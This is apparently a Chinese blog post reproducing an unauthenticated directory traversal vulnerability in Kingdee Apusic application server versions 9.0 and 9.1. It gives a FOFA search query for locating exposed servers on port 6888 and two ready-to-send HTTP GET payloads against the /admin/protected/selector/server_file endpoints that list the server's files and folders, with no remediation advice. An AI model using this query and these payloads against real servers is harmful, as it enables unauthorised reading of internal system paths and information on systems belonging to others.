Babing
Published on 2024-08-30 / 2 Visits
0
0

J17-6金蝶-Apusic应用服务器-目录遍历

J17-6金蝶-Apusic应用服务器-目录遍历

漏洞描述:

由于金蝶Apusic应用服务器 /admin/protected/selector/server_file/files、/admin/protected/selector/server_file/folders 等接口没有进行校验和过滤,直接将参数拼接到文件操作中,导致出现目录遍历漏洞,未经身份验证的远程攻击者可通过此漏洞读取系统内部系统文件路径及信息,导致信息泄露,系统处于极不安全状态。

影响版本:

Apusic_port = 6888
Apusic_version = 9.0、9.1

网站图片:

image-1.webp

网络测绘:

fofa语法:

(body=“easSessionId” || header=“easportal” || header=“eassso/login” || banner=“eassso/login” || body=“/eassso/common” || (title=“EAS系统登录” && body=“金蝶”) || header=“EASSESSIONID” || banner=“EASSESSIONID”) && port=“6888”

漏洞复现:

payload:

GET /admin/protected/selector/server_file/files?folder=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.712.36 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

效果图:
aec818c2478a471b80c783630312e050.png
poc-2

GET /admin/protected/selector/server_file/folders?parent=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.712.36 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

5e175d15c8b14d999ad726b9f4b43cb6.png


Comment